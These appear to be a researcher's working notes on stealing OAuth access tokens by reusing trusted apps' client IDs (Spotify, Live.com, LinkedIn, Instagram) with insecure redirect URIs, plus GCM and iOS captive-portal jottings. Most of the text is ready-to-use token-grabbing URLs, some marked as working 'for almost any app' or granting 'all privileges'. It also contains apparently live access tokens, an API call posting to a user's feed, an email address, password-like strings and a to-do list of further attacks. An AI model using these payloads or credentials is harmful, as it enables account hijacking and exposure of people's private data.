https://accounts.google.com/o/oauth2/auth?scope=email%20profile%20openid&response_type=token&access_type=online&redirect_uri=http%3a%2f%2fninjakiwi.com%2fauth%2fgoogle_oauth2%2fcallback&approval_prompt&client_id=160396963065.apps.googleusercontent.com

https://www.googleapis.com/oauth2/v1/userinfo?access_token=ya29.XgFbjPbzyhp0186dordLhWS3a0QQ10HLIi_-XHC2uEvXkvuL8op50do5ustZ4YQtqmVnLg_A-6_sFw

https://www.facebook.com/dialog/oauth?app_id=570213692990512&client_id=570213692990512&domain=ninjakiwi.com&redirect_uri=http://ninjakiwi.com&response_type=token&scope=email

https://graph.facebook.com/v2.3/me?access_token=CAAAAKLSe4lIBAOEhZAZBO7ZAJrdBYcPecNAbBX84RHQUh7OvUhJ4ecTURZCC3UqKrMtaCkLI8DL5D1Y3qk03GVCkN47FtRqg7eHy0WMTphtwF4aIbHveoBFZBnt6A4zgFZCvKT8pMeTHQXAcyKDRweStMHVkluaBRJ1VCsidvcT6JZACbb0LyA0vqBiUFtHCIZCVroSKkarIVgWY2NV8wMto

https://graph.facebook.com/v1.0/me/friends?access_token=CAAIGmzid5DABAPrevVHwUdZBeDilbDdSZA6phiQdZAEn81IKWvbT1lHBFNxvit3QdCBSExkKEhVSZCHiAUvXyg0ZC7vrWLp79ZBKyzgAVUGkTNd8hqmt5g7rAxlXsfwPpG1LnxWZAMBuXjPUs1Ofqto8inaBRVWk0w0NZAjuFK4fFMS35BooRQvGZAGzNAJZA1YtsEBZAXlS63JVtZCZAIZAZBZCL62v

https://graph.facebook.com/v2.3/me?fields=friends.limit%285%29&access_token=CAAAAKLSe4lIBAInkK6vevmjZAIvj7pEyiGnWBUnQKvUDTfLfhEdkcfK5DzO6OGSmz3ZCKhphCIWTzCpZCRla6wCzoJRe39ZBN1X7LG8ge0ZCjgJrHnyStHyjXd9pqkQyhxpkaDkqvyg9HJScOuba0ZCXnC2ZBSof5zLHb01tu5VdqAHvWRFAxFN8GcoJVVcdzQMVhHZAynE2dKbnGavuAM6p

POST /me/feed?message=VeryNice&access_token=CAAAAKLSe4lIBAInkK6vevmjZAIvj7pEyiGnWBUnQKvUDTfLfhEdkcfK5DzO6OGSmz3ZCKhphCIWTzCpZCRla6wCzoJRe39ZBN1X7LG8ge0ZCjgJrHnyStHyjXd9pqkQyhxpkaDkqvyg9HJScOuba0ZCXnC2ZBSof5zLHb01tu5VdqAHvWRFAxFN8GcoJVVcdzQMVhHZAynE2dKbnGavuAM6p

This works for almost any app (6p3So0GhyQP.js must be changed to a random value):
https://www.facebook.com/connect/ping?client_id=174829003346&domain=play.spotify.com&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQw.js%3Fversion%3D41%23cb%3Df3a3b80c86a762c%26domain%3Dplay.spotify.com%26origin%3Dhttps%253A%252F%252Fplay.spotify.com%252Ffb38541379475c%26relation%3Dparent&response_type=token

https://www.facebook.com/connect/ping?client_id=174829003346&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQo.js%3Fversion%3D41%23origin%3Dhttps%253A%252F%252Fplay.spotify.com&response_type=token

- Local use
- https://www.facebook.com/connect/ping?response_type=token&client_id=162729813767876&redirect_uri=fb162729813767876%3A%2F%2Fauthorize (trip advisor)
- To launch faceweb on iOS
fb://?al_applink_data=%7B%22target_url%22%3A+%22http%3A%2F%2Fbeta.facebook.com%22%7D

---> From Live.com!!!!!!!! with all privileges
https://www.facebook.com/connect/ping?client_id=30713015083&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQo.js%3Fversion%3D41%23origin%3Dhttps%253A%252F%252Fprofile.live.com&response_type=token

--------------------
LinkedIn on live.com
https://login.live.com/oauth20_authorize.srf?client_id=0000000044004F21&redirect_uri=http%3A%2F%2Fa.www.linkedin.com%2Fgenie%2Fhandle&scope=wl.basic+wl.emails+wl.contacts_emails&response_type=token

https://apis.live.net/v5.0/me/contacts?access_token=

-> PowerPoint on OneDrive: unfortunately HTTPS only
https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=easi2&scope=service::ssl.live.com::MBI_SSL_SHORT&display=ios_phone&username=alfredocoriandoli@hotmail.com&locale=en-US

https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf&scope=service::ssl.live.com::MBI_SSL_SHORT
https://login.live.com/ppsecure/post.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf

--------------------
Walgreens
https://instagram.com/oauth/authorize/?client_id=a8749d359c064181811a384c36658bee&redirect_uri=instagram://connect&response_type=token

polent4t0rron3
polent4t0rron3!

db-auth
dbapi-1 (up to 6)
dbx-dropbox

------------------------------------ TODO ------------------------------------
- Vulns in apps (e.g. YouTube, Dropbox, etc.)
- XSS via DeepLink
- CSRF via DeepLink
- Invalid Certs
- Force cookies to be sent in cleartext via DeepLink

------------------------------------ GCM ------------------------------------
Sender ID: numeric ID that identifies the app
Application ID: name of the package
Registration ID: received from GCM when the app registers.
- Should be secret
- Identifies that app on that device
- Usually saved in the preferences
- The app version is saved too. If there is a new version, the app should invalidate the ID and register again
- Must be sent OOB to the app's server in some way
Canonical ID: if an app registers twice, GCM offers it this ID (the last one used). It is up to the app to decide whether to use it
Sender Auth Token: identifies the server (secret)

- Is it possible to intercept the connection between the GCM service running on the device and Google?
- Is it possible to leak the Registration ID (for example Facebook's) using the OAuth redirect technique?

--------------------------------------------------------------------------------
iOS Captive
http://init-p01st.push.apple.com
www.appleiphonecell.com
captive.apple.com
captive.apple.com
www.apple.com
www.itools.info
www.ibook.info
www.airport.us
www.thinkdifferent.us
com.apple.WebSheet